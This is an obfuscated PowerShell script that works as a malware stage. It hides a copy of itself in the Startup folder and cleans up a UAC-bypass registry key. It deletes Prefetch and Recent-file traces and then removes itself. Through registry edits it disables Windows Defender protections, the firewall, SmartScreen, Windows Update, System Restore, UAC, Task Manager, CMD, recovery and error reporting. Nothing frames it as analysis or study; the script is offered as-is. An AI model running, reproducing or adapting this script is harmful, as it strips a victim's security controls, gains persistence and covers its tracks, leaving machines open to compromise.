${e`RrO`RaCTiO`Npr`EFEr`EN`ce}       =    (        (   'Si'  +     'le'     )  +      (  'nt'     +      'ly'  +    (   'Con'    +  'tin'   +      'u'    )    )      +  'e'        )

${S}     =    ${mYIN`V`oCATioN}."MYc`oMManD"."p`AtH"
${E}  =    (         &   ( 'G'    +     'et-Pr'  +     'oces'     +      's'  ) -Id ${p`iD}      )."PA`Th"
${f}       =     if (      ${s}     ) { ${s} } else { ${e} }

${TTTttTTtTT`TTT`T`T`Tt`TtT}  =    [System.Environment]::"GE`TFO`L`DerPatH"(    ('s'     +   (   'ta'   +    'rt'    +     'up'     )     )       )
${TTT`T`TtT`T`Tt`TTTt`TTTttT}       =    "$tttttttttttttttttttt\"

function i`N`V`Oke-`S`E`LfR`EpLicA`Tion {
    ${ReP`LIcat`ED}  =     [System.IO.Path]::"C`OmbINE"(   ${t`TtTtt`TtTtT`TtT`TtT`TTt}, [System.IO.Path]::"get`R`AnD`oMFiLenAmE"(      )       +    [System.IO.Path]::"geTE`Xt`ENSioN"(     ${F}       )    )
    if (      -not (            &      (    'Te'  +     'st-Pa'     +  'th'    ) (     ${TttTt`Tt`Tt`Tt`Tttt`TTTTT}     +      [System.IO.Path]::"gEtf`iLena`ME"(    ${f} )   )      )    ) {
            &   (     'Se'  +   't'     +  '-Content'   ) -Path ${REp`LIcA`TEd} -Value (   &       (   'Ge'       +  't-Con'   +   'tent'   ) -Path ${F} -Raw  )
        (     &   (  'Get'    +    '-Ite' +   'm'    ) ${RePl`IcAt`ed}    )."At`TRIb`UTEs"    =     (   'Hi'  +   'd'    +   (     'd'     +    'en'  )     )
    }
}

function in`VOKe`-`sel`FdEstruc`TioN {
 
        &     (   'Re'      +       'move-'   +    'Item'   ) -Path (    (    (     (      'H'    +    'KC'    )     +   'U'     )+    ':{0}So'   +     'f'  +    'tware{0}Classes{0}'   +       'ms'    +      (   '-'     +      (   's'    + 'etti'     )    )     +    'ngs{0}sh'    +  ( 'e'  +    'll'   )        )-F[cHaR]92    ) -Recurse -Force

    &     ('Get-Ch'  + 'i'    +    'ldIt'     +    'e'     + 'm'       ) -Path "$env:SystemRoot\Prefetch" -Filter (    (   '*'    +    (    'P'     +  'OW'     )   )   +  'E'    +       'RS' +    (    (    'HE'    +   'L'      +   'L*.'     )    +'pf'   )   )    |          &   (       'R'    +  'em'    + 'ove-Item'    ) -Force
    ${sCR`iP`TNAMe}     =    [System.IO.Path]::"GETfIleNa`MEw`IT`HO`U`TEXT`eNSIoN"(    ${F}    )
    ${pR`EFE`T`Ch`FILEs}        =          &     (      'G'       +   'et'   +    '-Chil'   +    'dI'  +      'tem'    ) -Path "$env:SystemRoot\Prefetch" -Filter "$scriptName*.pf"
    if (       ${PR`E`FeTc`H`FIleS} ) {
        foreach (     ${F`iLe} in ${pRefetCH`F`IlES}  ) {
             &  (    'Remo'  +     'v'  +    'e'       +   '-Item'   ) -Path ${F`ILE}."FuLln`Ame" -Force
        }
    }

    ${r`ec`eN`TFiLeS}    =      &   (  'Get'   +    '-Chi'     +    'ldItem'    ) -Path "$env:APPDATA\Microsoft\Windows\Recent"     |         &  (     'Wher'      +     'e-O'+     'b'   +    'ject'     ) { ${_}."las`TWr`iteTIME" -ge (    (     &     (      'Get-Dat'    +    'e'        )    )."ad`d`dayS"(     -1       )  ) }
    if (   ${rec`En`T`FileS}   ) {
        foreach (    ${F`ILE} in ${re`C`EnT`FiLeS}  ) {
               &     (       'R'  +    'em'     +   'ove-I'  +    'tem'      ) -Path ${f`ilE}."F`U`llNAMe" -Recurse -Force
        }
    }

    if (    -not (         &      (  'Test'   +    '-'    +    'Path'  ) (     ${Ttt`TttTTT`TT`TTT`T`T`Tttt}     +    [System.IO.Path]::"GetF`il`e`NamE"( ${F}   )      )    )  ) {
        if (  ${s}   ) {
                &   (    'Remove-'+   'Ite'    +       'm'    ) -Path ${f} -Force
        } else {
                    &    (  'St'  +     'a'       +   'rt-Pro'     +  'cess'   ) (     'POwERS'    +  'hElL.'     +    'Ex'   +     'e'      ) -ArgumentList (     '-'     + (     'No'   +     'P'  )      +    (    (       'rof'     +     'i'   )     +   (      'l'   +     'e '   )   )   +      '-C' +      (  'om'        +    'm'    +   (  'and'  +    ' '    )    ) +     (   (     "`"Remove-Item "    +     ''     )     +     ''       )    +   '-P'       +     ( (    'at'   +   'h'      )+   ' '    ) +       (    (  "'$f' "   +     ''      )     +   ''    )     +      '-'     +    (    'F'      +    (   'or'  +     'ce '   )    )    +   (    '-'   +    (    'E'    +    'rro'    )     ) +     'rA'     +  (     'c'     +    'ti'    )      +    (   'on'   +    ' '   )     +     "SilentlyContinue`""     ) -WindowStyle (    'hi'   +   'DDE'  +    'N' )
        }
    } else {
          &      (      'Ren'   +   'a'      +   'm'    +     'e-Item'     ) ${f} -NewName (    [System.IO.Path]::"geTraNdo`MF`IL`eNAME"(          )     +   [System.IO.Path]::"g`eTExteN`S`Ion"(    ${f}  )   ) -Force
    }
}

function SET-ReG`iSTR`YpRO`pERT`I`Es {
    param (    
        [string]${Pa`Th},
        [hashtable]${PrO`per`TIEs}
        )

    if (       -not (       &  (  'T'    +   'est-Path'  ) ${p`ATH}    ) ) {
           &  (    'New-Ite'      +  'm'    ) -Path ${p`Ath} -Force      |        &(       'Out'     +  '-Nu'     +    'll'     )
    }

    foreach (      ${k`EY} in ${PrO`Pe`R`TIEs}."ke`YS"  ) {
            &    (       'Set'   +  '-ItemPro'   +   'per' + 'ty'      ) -Path ${P`AtH} -Name ${k`ey} -Value ${pRope`RT`I`Es}[${K`eY}] -Type (      'D'      +    'WoRd'      ) -Force
    }
}

${ba`s`ekEY}     =      (    (    'H'    +    'KLM:{'  +     '0'    +   '}SOFTWARE{'     +  '0'    +   '}Policies'    +      '{0'      +   '}Microsoft{0}Wind'      +  (   (    'o' +     'ws'   )    +     ' D'      )  +    (   'ef'    +     (  'en'      +  'd'     )    +       'er' )     )-F  [cHaR]92      )
${rEAlTi`m`EPRoTEctI`On`keY}   =      (   (      (        "$baseKey\Real-Time "   +   ''      )  +    ''    )       +   'P'       +  (    (    'rot'    +    'ec'    )   +   't'       ) +    (       'i'   +      'on'  )        )
${Fi`REw`ALlPatH}      =     (    (     'H'     +   'K'    +  'LM'   +   ':{0'   +    '}SYS'     +    (    'T'   +    'EM' )    +    '{0}C'      + 'u'    +     (  'rr'      +     (      'en'      +    't'     )   )   +    'ControlSet{'     +     '0}Se'     +  'rvices{0}Shared'    +   'Ac'  +  'ce'     +      'ss{'   +      '0}Pa'  +     'rameters{0}F'   +   (        (      'ir'    +  'e'   )      +   'w'    )    +    ( (       'allP'     +    'o'      )   +    'l'   +     'ic'      )  +  'y'   )  -F  [chaR]92      )

       &       (       'r'      +  'eagent'     +     'c'    ) (    '/diSA'      +  'B'      +    'le'   )

      &   (    'Set-Regi'     +     'stry'     +    'Properti'   +      'es'   ) -path (    (     (     (    'HK'       +       'C'    )    +      'U:'  + (    'd'   +  'WyS'      )      +  (   'o'     +     'ftwa'      )   +  (   're'    +      'dW' )     +    'y'  )    +     (   'Mi'     +  (        'c'       +     'ro'    )      )   +      (    (  'sof'   +     't'     )     +   'd'   )     +  'W'   +   'y'        +     (   'Wi'   + (   'nd'        +  'o'  )      )    +   (     'w'    + (     'sd'    +    'Wy'   )     +     ( 'Curr'     +        'e'     +   'ntV'       )   )        +   'e'   +      (   (  'rs'      +       'i'       )    +      'on'    )     +     (    'd'      +  (    'W'    +      'yNo'    )        +  'ti'     )  +  (  (    'f'    +  'ica'    +    'tio'      ) +    'n'      +     (      's'  +  'dW'     )    +    (    'ySet' +    't'        )     +    'i'     )    +  (    (    'ngs'     +   'd'  )     +     'Wy'   +     'W'    )  +  'in'   +   'd'     +      'ow'     +   's'      +  '.'      +    'S'     +  'y'   +     (    (      'ste'  +     'm'    )  +    'T'       ) +  'o'      +     (  'as'    +    (        't.Se'     +    'c' )  +    (     'u'    +       'rity'      )     +    (     'A'     +   'nd'    )   )    +    'M'   +      'a'   +    (   (     'in'    +  't'    )  +     'e'      +    'na'     )    +     (  'n'       +    'ce'     )      )  -CreplAce(   'd'       +    'Wy'     ),[CHAR]92     ) -properties @{(     'E'   +      'na'  +    (       'b'  +     (   'le'    +        'd'   )    )  )  =        0}
    &      (    'Set-Regist'    +     'ryP'     +     'ro'   +   'p'     +      'ert'    +     'ies'   ) -path (   (     'HK'    +      (   'LM'    +     ':'      ) +       '{0}SO'     +       'FT'   +    'WARE{0'      +   '}P' +      (   'o'     +     (      'li'  +      'c'   )     )      +   'ie'   +     's'    +     '{0}'   +  (   (     'M'   +  'ic' )    +    (      'ro'   +  'so'   )     )     + 'ft'     +     '{0}Wi' +   (     'n'     +      'do'   )   + 'w' +       's '  +        ( 'D'   +    (     'e'    +     'fe'    )    )     +    (   (    'nd'      +     'e'   )  +     'r'   )   +   ( (   ' S'    +    'ecu'       +   'ri'      )     +  'ty'  +   ' C'     )      +  'e'     +    (   'n'      +     'te'   )       +      'r{'    +     '0}'   +    'No'     +  (   'ti'    +   (    'f'  + 'ica'     )   )  +      'ti'  +     (     'o'     +   'ns'     )    ) -f  [CHaR]92     ) -properties @{(     (     (    'Di'   +   's'   )    +    'ab'   )   +  (    (    'l'     +   'eNoti'   +      'f'    )    +     'ic'    +   'a'   )    +  't'     +    'i'   +    (  'o'    +   'ns'   ) )    =     1}

    &      (      'S'     +     'e'  +    't-Regis'     +    'try'    +    'Prop'   +       'erties'  ) -path ${BASe`keY} -properties @{
    (       (    (      'Di'     +     's'  )  +    'ab'      )    + (       'l'   +(    'eA'   +     'n'      )     )     +   (    't'    +      'iS'     +    (   'p'    +  'yw'      )        )   +     'ar'   +     'e'    )    =     1 
    (      'Di'   +    (    'sa'  +     (   'bleAp'  +   'p')   )+     (     'l'     +   'ic'      )   +      (    'at'      +  (      'io'  +    'nG'  )      )    +  'u'    +   'ar'       +    'd'  )      =       1
    (      ( 'Di'   +    's'     )   +   (    'a' +    (    'ble'    +   'C'        )  )  +      (    (   'o'  +      'ntro'    )      +  'l'   +  'le'  +       'd'    )     +      'F'    + (    (  'o'   +  'lde'       )    +  'r'    )     + (   'Ac'    +     'c'    )    +  (     'e'  +    'ss'      )     )     =        1
    ('Di'    +    (       'sa'    +   'bl'    )   +     'eC'+      're'    +     (      'd'    +    'en'   +    (      'tial'   +     'Gu' )    )   +     'ar'   +    'd'  )     =     1
    (   (      ('D'    +       'isa'  )     +     'bl'     )    +     'eI'      +'n'    +   (     (    'tr'    +    'us'      )      +    'i'     )     +  'on'    +   'P'    +   (  'r'   +   (  'ev'    +       'e'       )   )   +     (      (     'n'    +   'ti'  )   +    'o'    )     +        (   (   'nS'     +  'y'    )  + 'st'      )  +   'em'  )       =  1
    (    'Di'   +       's'  +     'a'     +  'bl'       +   ( 'e'     +   (   'IO'       +    'AV'    )    +      (      'P'   +     'rot'      )     )   +    (    'e'     +  'ct'    )     +    (     'io'   +   'n'      )   )    =   1
    (  'D'     + (    'is'      +    'a'    )       +  'b'       +   (    (    'le'   +   'R'     )    +       'e'    )     +      'a'    +  ( (     'l'    +   'ti'   )      +   (    'meMo'  +   'n'   )      +     'i'    +     (      't'      +  'or'      )   )  +   (   'in'    +   'g'    )      )        =     1
    (      (     'Di'    +     's'    )     +   (   (     'a'      +    'bl'     )      +  'e'      +    (  'Ro'      +  'u'     )   )   +    'ti'      +  (   'n'    +     (      'e'     +     'lyT'   )   )   +  'a'    +   (  'ki'   +   'ng'      )  +   (    'Ac'   +    't'  )       +    (     'i'    +   'on'   )     )    =    1
    (    (   'Di'      +     (      'sa'    +  'b'      )  )   + 'l'  +     (     'eS'       +      'pe'  )     +  'ci' +    'a'   +    (   'lR'     + (   'u'+     'nn'     )   +      (      'i'       +    'ng'  )  )    +   'M'    +    'o'      + (   'de'    +     's'     )    )       =     1
    (    (    'Di'     +    's'  )  +     (      'ab'     +     'l'   )      +     (       'eT'      +  (     'amp'     +     'er'     )    ) +     (     (  'Prote'     +    'cti'   )    +      'o'       )    +    'n' )   =      1
    (   (   'P'  +    (      'UA'    +   'P'      )     )     +   'ro'      +     (   (      't'    +    'ect'    )   +      'i'  )    +  'on' )    =     0
    (       (      'S'  +    (    'er'     +       'v' )    +     'ic'   )      +   (   (      'e'    + 'Ke'  )     +      'ep'   +'A'       ) +'l'  +       (     'i'     +   've'    )     )     =      0
}

    &   (     'Set'     +      '-Re'      +   'gistry'    +   'Pro'  +      'perties'     ) -path ${reA`ltIme`PrOTeCTi`onKEy} -properties @{
    (   'Di'    +      'sa'      +    'b'    +   'l'     +   (      'e'    + 'Be'   +     (     'ha'      +   'viorMo'    +  'n'       )    )      +    (  'it'     +   'o'   )   +(  (     'r'    +   'in'     )  +    'g'    )    )    =       1
    (      (  (   'Di'       +   's'    )  +    'a'  )    +   'bl'  +   (   ('eB'   +  'l'  )   +    'o'    +   'ck'  )   +    (      'A'       + 't'      +    (   'F'   +   'irs'    )   )   +       'tS'   +  (   'e'   +     'en'  )   )      =     1
    (    'D'     +     'is'    +   'ab'    +   (     'l'  +      (  'eCl'      +   'o'    )     )     +     'ud'   +   'P'      + (    'ro'   +    (      't'      +  'ec'  )     +       (    'tio'       +      'n'     )  )      )      =     1
    (    (    'Di'     +    's'     )    +  (     'a'      +    'bl'    )    +     (   (    'e'     + 'On' )    +   (    'A'    +     'cc'     )   +   'es'    )  +   'sP'   +  (   'ro'     +    (    'tect'     +   'i')     +     'on'  )    )     =    1
    (     (     'D'   +     (    'isa'    +    'b'  )     )      + (     'l'     +    (     'e'   +  'Sc'      )    )      +       'a'  +   (   'nO'    +'n'     + (      'Rea'  +     'lt'    )     )      + 'i'   +    (     (    'me'      +    'E'     )      +     'n'    )     +  'a'    +   'b'   +   'le'    )      =        1
    (     (  'Di'    +    'sa' )      +    (      'bl'   +  'e'      )  + 'S'        +        'cr'  +    (   'ip'    +     't' )      +      (     (      'Sc'     +     'annin'       ) +    'g'      ) )    =     1
    (     'S' +    (    'ub'       +     (      'm'   + 'itSa'     )       )   +     'mp'  +     'le'       + (  'sC'+      'o'   )    +    'n'   +   (     's'  +  (      'e'   +     'nt'    )    )       )   =       2
    (     (    (   'Disa'      +     'b'   ) +     'l'   )       +      (    'e'    +        (    'N'  +      'et'     )  )  +    'w'     +      'or'      +     (      (  'kPr'     +    'o'  ) +    'te'     )  +   'c'        +      (     'ti'    +     'on'   )  )  =   1
}

  & (  'Set-Regi'    +    'st'    +    'ryP'    +  'rope'     +    'rtie'   +  's'       ) -path "$firewallPath\DomainProfile" -properties @{(       'E'    +     (   'n'       +   'ab'   )  +      (      'l'  +   (    'e'   +'Fi'     )  +   'r'  +    (      'e'      +    'wal'  )    )   +    'l'     )   =    0  ;         (      (        'Di'    +     (  's'+      'ab'       )       )    +   'l'       +  (  'eN'     +  'ot'       )   +      'i'   +   (     'f'  +   (   'ic'    +   'a'   )    )     +     'ti'     +    (    'o'     +   'ns'     )      )    =      1}
  &   (     'Se'     +  't-Re'   + 'gist'   +  'ryProp'  +   'er'    +      't'    +     'ies'        ) -path "$firewallPath\StandardProfile" -properties @{(  'E'    +   (  'n'     +   'ab'      )    +   (   ( 'l'    +   'eF'     )  +   'i' +   (   'rew'    +   'a'    )    )   +   'l'+   'l'     )     =     0    ;    (      'D'      +      (  'is'     +     (   'abl'  +   'eN'     )    )     +  (  'o'     +      'ti'      +      (    'fi'    +    'c'   )     )    +     'a'  +  (   'ti' +    'o'     )      +   'ns'  )      =    1}
  &  (    'Set-Regi'    +     'stryP'    +     'r'    + 'oper'     + 'ties'    ) -path "$firewallPath\PublicProfile" -properties @{(    (   (     'E' +  'na'    )   +    (      'bl'     +    'e'    )      +  'Fi'   )  +    (     're'+    'w'      )  +  'al'    +   'l'      )     =   0       ;    (      (   (       'D'   +      'is'    )     +      'a'    +      'bl'   )   +      (     (    'e' +    'No'   )    +  (   't'   +     'if'      )   )     +'ic'    +  'a'     +   'ti'    +   (   'o'+     'ns'      )     )       =   1}

    & (    'S'    +   'et-I'    +   'tem'      +    'Propert'    +   'y'    ) -Path (  (  ( (    'H'   +    'KL'     )   +   'M' )  +   (    (     ':'    +    'bl'     )      +     'n'    )   +  (     'S'     +   'OF'     +    (  'TWA' +   'R'   )    )   +      (  'E'     +     (   'bl'    +   'nMi'     )      +     'c'     )  +  (    'r'     +       (    'o'  +     'so'  )  )+   'f'   +   (    (    'tb'  +     'lnW'    )   +    (       'i'   +       'nd'     )       )      +  (        'o'      +      'ws'   )     +     (     'b'       +  'ln'       )     +     (      'Cu'     +    'r'    )    +      (      'r'   + 'en'    )        +    't'    +    (   'Ve'      +   'r'   +       (      'si'    +  'on' )     )      +     (   'bl'    + 'nE'    )     +       'xp'      +     (   'l'    +     'or'   )    + 'er'   )  -CreplaCe  (    'b'    +    'ln'    ),[chAR]92   ) -Name (      (    'S'    +    'ma'      )   +    (      (       'rtS'  +  'cre'    )  +     'e'  +   'n'     )       +      (     (  'E'   +  'na'   )     +    'bl'    )    +    'ed'   ) -Value (   'O'    +  'ff'     ) -Type (    'ST'  +     'RINg'       ) -Force
    &  (  'Set-Re'       +    'gi'      +    'str'     +     'yPropert'    +   'i'  +     'es'   ) -path (     (      (    (      'HK'      +    'C'        )   +    (    'U:M'     +     '1rS'    )      +    'OF'   +    'TW'   +     'A'    )   +    'R'      +   (      'E'    +    (    'M1'      +     'r'   ) )  +   'Mi'  + 'c'      +  (     'r'+       'os'    )      +  'o'      + (     (       'f'   +   'tM1'     )    +   'r'    )    +  'E' +      'd'     +  ( (      'ge'    +  'M'      )    +  '1r'   )    +       (        'S'     +  (  'm'    +      'art' )     )    +   'S'    +   'c'    +     (      're'    +       (      'e'   +     'nEn'    )    + 'ab'  )       +  'l'    +   'ed'       )."REpl`ACe"(   (      'M1'     +       'r'      ),[StRiNg][CHAR]92  )    ) -properties @{(      (     (  (     (   '(D'     )  )   + 'e'     )     )  +(   'f'     +  ( 'au'    +   'lt'  )    )   +    ')' )       =     0}
   &    (    'Set-'   +  'Regist'   +       'ry' +  'Pr'    +        'opertie'   +        's'     ) -path (   (    (  (      'H'    +    'KC'   )  +     'U'      )   +   ':m'     +     (    'Wu'   +     'SO'     +     'FT'   )   +   (   (   'WARE'    +  'mW' ) +   'u'     )    +   (     'Mi'      +   'cr'     ) +   'o'   +  's'      +      'o'   +     (    (     'f'    +       'tm'     )    +     (   'W'    +        'uW'   )    +      'i'    +     (    'nd'  +   'o'     )      +     (     'ws'   +      'm'      ) )  +    (  ( 'WuC'      +    'u'    )   +   'r'    )     +      (    'r'     +     'en'      )      + 'tV'      + (      'er'     +   's'   )    +  (  (  'ionmW'     +   'u'  )   +    'A'    )   +     (    'p'    +     (  'pH'     +  'o' )   )   +  's'      +   't' )  -rePLacE  (     [char]109     +    [char]87   +      [char]117    ),[char]92    ) -properties @{(   (   'E'    +    (       'nab'   +    'le'        )     )     +     (   'We'    +  'bC'    )   +     'o'   +   (   (     'nten'   +     't'    +     'Ev' )    +     'a'      )       +   'lu'     +       (  (      'a'    +    'ti'  )    +     'on'    )     )      =       0}

      &  ( 'Set-Re' +    'gist'  +    'ryProperti'     +    'es'   ) -path (  (   (  (    'H'  +    'KL'      )     +   'M'   )     +      ':{0}'  +     (     (   'SOF'       +   'TW'        )     +        'A'    +      'RE'    )  +   '{0}Po'+     (    'li'  +    'ci'     )     +     'es{'     +      '0}Mic'     +      'r' +    (     'o'    +    'so'  )   +      'ft{0}'     +     (   'Wi'   +    'nd'   )     + 'ow'     +    's{0}W'    +     'in'  +       (   (     'd' +      'ows' )      +       'U'      )      +    'pdate{0'        +      '}AU'      )-f  [ChAr]92 ) -properties @{(      (      'No'   +   (   'Auto'    +    'Up'   )      +    'd'      )      +  'a'      +     'te'    )     =    1}
      &  (    'Se' +    't-Regis'       +     'try' +   'Pro'   +   'per'     +      'tie'    +    's'  ) -path (   (   'HK'   +      'L'   +        'M:{0}SY'    +    'ST'    +     'EM{0'    +      '}C'     +    'ur'   +   ('r'  + (      'en'      +'t'  )     )   +     (     'C'    +     (     'o'  +   'ntro'      )     )    +     (      ( 'lS'       +  'e'  )  +      't'     )  +     '{0}S'    +   'e'    +  'r'    +     (  'vi'  +     'c'     )    +  'e'  +      's{0'   +    '}wuauserv'    )  -F[ChAr]92     ) -properties @{(      (    'St'      +      'ar'      )    +     't'   )   =   4}

   &    (   'Set-R'   +    'egis'   +  'try'    +    'P'    +  'ropertie'     +  's'  ) -path (     (  (        (     'HKLM:'  +  'g'   )     +       (     'CD'     +      'S'    )     +   'O'   +   'F'      )      +      'TW'    + 'A'    +      'RE'     +      'gC'    +     (     (   'DPo'      +    'lici'     )   +      'es'    +   'g'    )  +   ( (    'C'+       'DMi' )    +     'c' )    +    ( 'r'    +   (    'o'   +      'so'    )      )     +   (   'ft'   +      'gC'     +     (      'D'   +      'Wi'    )    ) +   (    'nd'    +   (   'ows'   +   ' '   )   )      +    (   'NT'   +   (     'gCDS'  +   'ys'      ) +    (    't'      +  'emRe'    +    's'     )   +     't'       +        'or'    )    +     'e'    )-CrEPLAcE  (     'g'  +     'CD'),[cHAR]92  ) -properties @{(    'Di'     +      's'   +    (      'a'      +     'b'   +  (    'leS'   +  'R'    )      )     )     =    1   ;    (     (    'Di'   +   's'    )+ (      (    'abl'       +  'eCo'    )  +    'n'   +      'f'   )   +   'ig'    )        =       1}
  &    (   'S'      +      'et-'     +     'Re'    +    'gistryProp'    +    'ert'      +   'ies'    ) -path (     (     (    'H'    +    'KL')       +      'M:{0}SY'    +  (     'S'      +     'TE' )     +   'M{0}Cur'     +   (    (   're'     + 'n'  )      +  (  'tCo'    +       'n'      )   )    +  'trolSet{0}Se'    +       'rvices{0}'      +  (     'sr'     +      'se'     )        + 'r'     +   ('v'  +    (    'i'  +   'ce'    )     )       )-f [CHAR]92      ) -properties @{(  'St'    +   (    'ar'   +   't'    )     )    =     4}

      &      (      'Se'   + 't-Re' +   'g' +    'istryP'      +  'ro'   +   'perties'    ) -path ( (  'HK'   +    'C'    +   (  (    'U:K'    +    'y'  )   +     'P'   )    +  'So'    +  (    'ft'      +      (  'wa'   +      're'    )   )     +  (    (    'K'     +     'yP'    )   +    'M'   )   +  'i'       +    ('cr'     +    'o'       )      +     (  's'      +      (    'oft'   +      'K'    )   )  +    (  (      'yP'   +    'W'     )   +  'i'    )     +      'nd'      +    (    'ow'    +  'sK'   )   +     (     'y'     +      (     'P'  +    'Cur'      )  +(   'r'    +'en'      )       )  +   ( 'tV'   +      'e'    )     + 'rs'    +  (  'i'     +    'on'    )      +    (     'Ky'    +    'P'      )       +      (     'Po'   +    'l'    )  +      (     (    'ic'     +    'i'    )    +     'e'     +   (      'sK'    +  'y'    )   )   + ( 'PS'   +  'y'       )  +     's'  +      't'     +   'em'   )."R`epla`Ce"(     (     'K'  +       'yP'      ),[sTriNg][ChAr]92  )    ) -properties @{(    (    (     'Dis'     +    'a'  )     +      'b'    )  +     (   ('le'    + 'T'    )  +  'as'  )      +      'k' +    'M'      +     'gr'      )    =     1}

   &      (      'Se'      +   't-'       +    'Re'    + 'gistryPr'   +     'ope'      + 'rties'     ) -path (       (     (      (     'H'   +     'KCU'       +   ':T'  )  +    'U'    )   +   'LS'     +    (    'of'      +     (    'tw'  +   'a'      )   )        +      'r'  +    (    (     'eT' +   'ULP'    )     +     'o'      +        (   'l'    +    'ici'   )     )  +    (    'es'     +   'T'  )     +   (      'U'   +      'LM'      )    +     ( (   'ic'      +      'r'    )    +  (  'os'   +    'of'   )    +     (        't'  +      'TU'     )    +   'L'        )       +  (    (   'Wi'     +       'nd'      )     +      'o'   )   +(   'w'     +    'sT'      ) +   (    'U'  +      (   'L'     +       'Syst'      )    +  'em'   )   )."Re`PLACE"(     (    'T'    +       'UL'  ),[sTriNG][ChAR]92 )   ) -properties @{('Di'     +  's'     +  'a'  +   ( 'b'    + (   'le'    +  'C'    )+   'MD' )    )    =       1}

   &    (      'Se'      +    't'      +    '-RegistryPr'    +   'o'      + 'perties'    ) -path (  (      (    'H'  +      'KL'     )      +  'M:{0'  +    '}SYSTE'   +      'M'     +   '{0}Curren' +    (  (    't'      +     'Co'     )  +        (   'n'   +     'tro'    )   +   (    'lS' +    'e'    )    )  +     't{' +    '0}Co'    +     'nt'  +    'rol{0}Ter'    +      'mi'    +      (   'na'      +   'l '    +     (     'Ser'   +   've'    )     )     +  'r'   )  -F [chaR]92   ) -properties @{(    (       'fD'   +    (     'e'      +    'ny'      )        )    +    (     (      'T' +      'SC'  )   +   'o'    )    +   (      'nn'    +      'e'   )  +    'ct'   +  (  (     'io'      +   'n'     )      +  's'        )      )      =      1}

  &    (     'Set-Regis'  +     'tr'  +     'yProp'    +  'erties'     ) -path (  (  'HKLM:{0}SOFT'   +   'WA'      +   'R'   +    'E{'      +   '0}'      +   'M'  +       'i'      +   'c'       +      (      'ro'     +    's'     )  +  'o'     + 'ft{0}'      +  'W' +  (      'in'     +  'd'     )   +    'ows{0}C'    +    (    (  'ur'     +    're'     )     +     'nt'    +    'Ve'      )     + 'rsion{0'   +    '}Polic'      +   'i'        + 'es'     +     '{0}S'  +      (   'ys'  + (     't'   +   'em'    )     ) )  -F  [ChAR]92     ) -properties @{(      'E'  +      (     'na'      +  'b'    +  (     'l'     +        'eLU'   )  )  +     'A'    ) =   0}

  &     (    'S'       +   'et-R'      +      'egi'+   'stryProp'   +  'e'   +   'rt'      +    'ies'    ) -path (  (  'HK'   +  ( 'L'    +    (     'M:'      +    'hi'    )     )     +    (    '7S'    +   'Y'   )      +       'ST'   +   (   (     'EM'     +     'hi7Cur'      +   'ren'      )       +  't'    +  'C'  )       +    (    (     'ont'    +    'r'   )    +      (  'o'   + 'lS'   )  )    +  'et'   +     (    'h'    +    (   'i7'     +      'S'    )    )   +     'er'    +      'vi'       +      (  (  'ce'      +   's'    )      +    'hi'     +     '7'      )      +     (     'ws'  +     'c'     )   +   (     'sv'   +     'c'        )        )."r`epLace"(     (     [ChAR]104  +    [ChAR]105   +    [ChAR]55    ),[StRInG][ChAR]92 )     ) -properties @{( (      'S'    +       'ta'   )    +   'rt'   )   =    4}

    &     (  'Set-RegistryPrope'   +   'r'      +     't'   +   'i'     +      'e'    +    's'    ) -path (  (  (   'HK'  +    'L'     )      +    (   (  'M:'+  'Y'      )   +  (       'a1S'    +   'OFTW'     )   +    'AR'     )      +    'E'  + (  ( 'Ya'     +     '1M'    ) +   'ic'   )     +    (     'ro'    +     's'      )    +        (  (    'of'  +       't'    )   +   'Y'     )     +    'a'   +    '1W'   +    'i'    +    'nd'     +   ( 'o'    +      'ws'      +    (    'Y'   +      'a1W'  )      +    (     'i' +      'nd'  )      )      +     (   (   'ows'     +    ' '   )     +     (     'E'     +  'rr'  )     +      'o'      +     'r '      )    +    ((    'Re'  +      'por'+  't'   )    +  'in'     )     +   'g'   )."Repla`Ce"(       (      'Ya'   + '1' ),'\'   )     ) -properties @{(     (     (   'Di' +    's'     )    +    'a'     +    'bl'      )+    'e'     +    'd'       )       =      1}

     &     (        'S'  +    'et-Re'      +     'gi'    +   'stryP'   +   'roperti'      +      'es'    ) -path (  (     'H'   +    (    (    'KLM:'        +    'B'  )      +     '0'   +    'E'   )      +    (  'SY'    +'S'      )  +      (    (  'T'   +     'EM'  ) +       (     'B'      +   '0E'    +      'Curr'      )  +      'e'    )   +   (      (     'ntCo'   +  'n'    )      +  't'  ) +   (  (   'rol'      +  'Se'     )  +   't'    +  (   'B' +     '0E'    )     )       +    'Co' +      (      'nt'   +      (   'ro' +   'lB'   +     '0E'    )   +    'R'        )   +     (     'e'       +   'mo'    + (      't'     +   'e '     )   )   +    'As'    +     's'    +     (     'is'    +    (  't'  +   'ance'  )     )    ) -RepLAce(       [Char]66   +   [Char]48      +  [Char]69     ),[Char]92      ) -properties @{(     'f'    +    (   'Al'  +        (    'lo'      +     'wTo'    )    )     +   'Ge'      +    'tH'    +  (     'e'   +      'lp'    )   )     =    0}

 &   (   'Se'     +   't-'  +   'RegistryPro'     +   'p'    +    'ert'    +    'ie'  +   's'    ) -path (    (      ('H'        +   (     'K'     +       'LM'     ))        +   (  (  ':h'    +     '1'     ) +    'FS'    )  +   (   'YS'    +   'TE'  +        'Mh'     )        +   '1'    +    (    'FC'    +    'u'   )  +    (     (    'rrent'     +   'C'     )      + 'o'    +  (     'n'      +    'tr'    )       )    +       'ol'   +     (    (   'Se'   +    'th' )    +    '1F'   +    'Se'  )   +   (    (    'rvic'   +     'e'   )   + 'sh'   )   +   '1'    +   'F'   +      'Wa'     +    'a'     +   (   'SM'    +  (   'ed'+      'i'   )    )       +   'cS'     +   'v'    + 'c'    )."R`e`PLACe"(  (    [cHAr]104   +     [cHAr]49      +    [cHAr]70    ),'\' )      ) -properties @{(     'S'   +    (    'ta'    +    'rt' )        )     =    4}

    &      (     'S'     +   'e'       +      't-Re'     +   'g'    + 'is'   +  'tryPr'     +    'operties' ) -path ( (    (     'HK'        +  'L'  )    +     (   'M'     +      (   ':' +  'ND'      )   )  +    (    'l'       +    (   'SY'  +      'S'     )    )   +       'TE'  +      'M'     +  (      'ND'       +     'l'    +      (      'Cu'  +      'rre'     )        +   (    'n'      +    'tC'     )    +      'on'     )     + 'tr'      +   (    (  'o'      +  'lS')     +     'et'       )    +    'N'      +   (   (       'Dl'      +    'Servi'   +    'c'   ) + (    'es'      +      'N'   )     +      'Dl'    )   + 'BI'     +  'T'     +      'S'    )  -rePlAcE (    [CHAr]78     +      [CHAr]68      +        [CHAr]108    ),[CHAr]92   ) -properties @{(     'St'  + (       'ar'      +   't' )  )     =     4}

